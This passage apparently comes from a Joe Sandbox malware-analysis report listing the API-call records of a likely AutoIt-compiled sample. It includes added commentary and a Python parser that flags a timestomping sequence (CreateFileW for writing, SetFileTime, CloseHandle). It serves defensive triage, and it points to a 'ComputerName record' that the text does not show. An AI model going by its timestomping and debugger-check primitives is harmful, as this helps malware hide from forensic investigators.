  • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
  • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
  • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
• RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
• Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
• Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
• Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
• SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
• CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
• Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
• Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
• Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
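The record above is the one worth a second look when triaging this image: CreateFileW is called with dwDesiredAccess 40000000 (GENERIC_WRITE), dwShareMode 1 (FILE_SHARE_READ), dwCreationDisposition 3 (OPEN_EXISTING) and dwFlagsAndAttributes 80 (FILE_ATTRIBUTE_NORMAL), and the handle is passed straight to SetFileTime and then closed. That is the primitive needed to rewrite a file's timestamps (timestomping). Because the report elsewhere classifies this image as a likely compiled AutoIt script, the routine is most plausibly the interpreter's own file-time helper; its presence shows the capability is linked in, not that the embedded script used it. The parser below is an added example, not part of the Joe Sandbox report or of the sample: it reads these per-function API records, decodes the CreateFileW arguments by their Win32 constant values, and flags the open-for-write, SetFileTime, CloseHandle sequence. The line grammar it assumes ("• Name.MODULE(args), ref: addr", with subcall lines prefixed by "Part of subcall function") is inferred from the report layout, not a documented Joe Sandbox format, and the sample input is the three API lines copied from the record above.

```python
"""Parse Joe Sandbox per-function API records and flag file-time tampering.

Added example; not code from the Joe Sandbox report or from the analysed sample.
The record grammar matched below is inferred from the report layout (assumption).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 constants (winnt.h / fileapi.h) needed to read CreateFileW's arguments.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE = 0x1, 0x2, 0x4
FILE_ATTRIBUTE_NORMAL = 0x80
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Constructed input: the three API lines of the record above, copied verbatim.
RECORD = """\
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
• SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
• CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
"""

# One API line: optional subcall prefix, Name.MODULE, optional "(args)", ", ref: addr".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list               # int for hex slots, None for '?', str for inlined literals
    ref: int                 # address of the call site
    parent: Optional[int]    # set when the report lists the call under a subcall


def _arg(tok: str):
    """Decode one stack slot as the report prints it."""
    tok = tok.strip()
    if tok == "?":
        return None          # not resolved by the analysis
    try:
        return int(tok, 16)
    except ValueError:
        return tok           # an inlined literal such as "%I"


def parse_apis(record: str) -> List[ApiCall]:
    """Return the API calls listed in one function record, in report order."""
    calls = []
    for line in record.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), parent))
    return calls


def _bit_names(value, table: dict) -> List[str]:
    return [n for bit, n in table.items() if isinstance(value, int) and value & bit]


def decode_create_file(call: ApiCall) -> dict:
    """Name the CreateFileW parameters. Only the first seven printed slots are
    arguments; the report dumps further stack slots that belong to the caller."""
    if call.name != "CreateFileW" or len(call.args) < 7:
        raise ValueError("not a CreateFileW call with all seven arguments")
    access, share, disp, attrs = call.args[1], call.args[2], call.args[4], call.args[5]
    return {
        "desired_access": _bit_names(access, {GENERIC_READ: "GENERIC_READ", GENERIC_WRITE: "GENERIC_WRITE"}),
        "share_mode": _bit_names(share, {FILE_SHARE_READ: "FILE_SHARE_READ",
                                         FILE_SHARE_WRITE: "FILE_SHARE_WRITE",
                                         FILE_SHARE_DELETE: "FILE_SHARE_DELETE"}),
        "creation_disposition": DISPOSITIONS.get(disp, disp),
        "normal_attributes": attrs == FILE_ATTRIBUTE_NORMAL,
    }


def analyze(calls: List[ApiCall]) -> dict:
    """Flag a function that opens a file with write access and later calls
    SetFileTime: the timestomping primitive. Capability, not proof of use."""
    write_open = [i for i, c in enumerate(calls)
                  if c.name == "CreateFileW" and len(c.args) >= 7
                  and "GENERIC_WRITE" in decode_create_file(c)["desired_access"]]
    set_time = [i for i, c in enumerate(calls) if c.name == "SetFileTime"]
    return {
        "opens_for_write": bool(write_open),
        "sets_file_time": bool(set_time),
        "closes_handle": any(c.name == "CloseHandle" for c in calls),
        "timestomp_capable": bool(write_open and set_time and write_open[0] < set_time[0]),
    }


if __name__ == "__main__":
    calls = parse_apis(RECORD)
    print(decode_create_file(calls[0]))
    print(analyze(calls))
```

Run over a whole report, the same parser lets you group records by Source File offset, so that calls from the unmapped 00A70000 region (the ComputerName record above, "based on PE: false") are kept apart from the runtime routines of the 00400000 image.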
APIs
• _free.LIBCMT ref: 00468D1B
  • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
  • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
• _free.LIBCMT ref: 00468D2C
• _free.LIBCMT ref: 00468D3E
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
• Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
• Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
• Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
• Opcode ID: a1baa42b8be179491f8629f726f649e9c6f633d5cce95d2c5905adb20c947136
• Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
• Opcode Fuzzy Hash: a1baa42b8be179491f8629f726f649e9c6f633d5cce95d2c5905adb20c947136
• Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
APIs
• CharLowerBuffW.USER32(?,?), ref: 00465B93
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
                                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2358735015-0
                                                                                                                                                  • Opcode ID: 3bd510dce60f882055807d3a845cafcdb67b7cee73f834c135eafde4b5b67fbd
                                                                                                                                                  • Instruction ID: ca699bb1c278210e2bea96785600e82950db412e583262dd6e63fce83db42ac8
                                                                                                                                                  • Opcode Fuzzy Hash: 3bd510dce60f882055807d3a845cafcdb67b7cee73f834c135eafde4b5b67fbd
                                                                                                                                                  • Instruction Fuzzy Hash: 0441A2B2500709AFDB11DF65C8809AFB3B8EB44314F10862FE956D7281EB78AE01CB55
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: 342b1ffb58077d8b19272d94146cfab44cad903d4b78f1b9013ddb096df52ce6
                                                                                                                                                  • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                                                                                                                                  • Opcode Fuzzy Hash: 342b1ffb58077d8b19272d94146cfab44cad903d4b78f1b9013ddb096df52ce6
                                                                                                                                                  • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00A755C0,?,00000000,00000000), ref: 00A75A51
                                                                                                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 00A75B11
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$CreateExitUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4108186749-0
                                                                                                                                                  • Opcode ID: 609b53989c3d95273d7548ffdac313cae53326034b14b9c1c3aeae66f42ad666
                                                                                                                                                  • Instruction ID: 5bb19e6b6bca6d577d6af79044e01eea3b8784a3c7ad12da4e0eb41220031de6
                                                                                                                                                  • Opcode Fuzzy Hash: 609b53989c3d95273d7548ffdac313cae53326034b14b9c1c3aeae66f42ad666
                                                                                                                                                  • Instruction Fuzzy Hash: D7111711D0DBC14ED7238B784C25766AFA05F62720F5DC6DAD0988E0E3D2D98D0993A3
                                                                                                                                                  APIs
                                                                                                                                                  • IsThemeActive.UXTHEME ref: 00404834
                                                                                                                                                    • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                                                                                    • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                                                                                    • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                                                                                    • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                                                                                    • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                                                                                    • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                    • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                    • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                    • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1438897964-0
                                                                                                                                                  • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                  • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                                                                                  • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                  • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                    • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                    • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3902256705-0
                                                                                                                                                  • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                  • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                                                                                  • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                  • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __lock_file_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 26237723-0
                                                                                                                                                  • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                  • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                                                                                                                  • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                  • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  • __lock_file.LIBCMT ref: 004253EB
                                                                                                                                                    • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                                                                                  • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
APIs
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A75D6D
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Similarity
• API ID: FreeVirtual
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Similarity
• API ID:
APIs
  • Part of subcall function 00BF68E0: GetFileAttributesW.KERNEL32(?), ref: 00BF68EB
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00BF71F9
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Similarity
• API ID: AttributesCreateDirectoryFile
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Similarity
• API ID:
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ProtectVirtual
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ClearVariant
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove
APIs
  • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
  • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
  • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
  • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                  • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                  • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                                                                                  • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                                                                                  • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: e09cf8f158240847f163746c94635338a8ca539da29f0f4cb2d32bb0dd1ac3f6
                                                                                                                                                  • Instruction ID: 9502f8dbdc697bbaecbad273772590a64815e6bf1b2d147f30bec835a0f5f76b
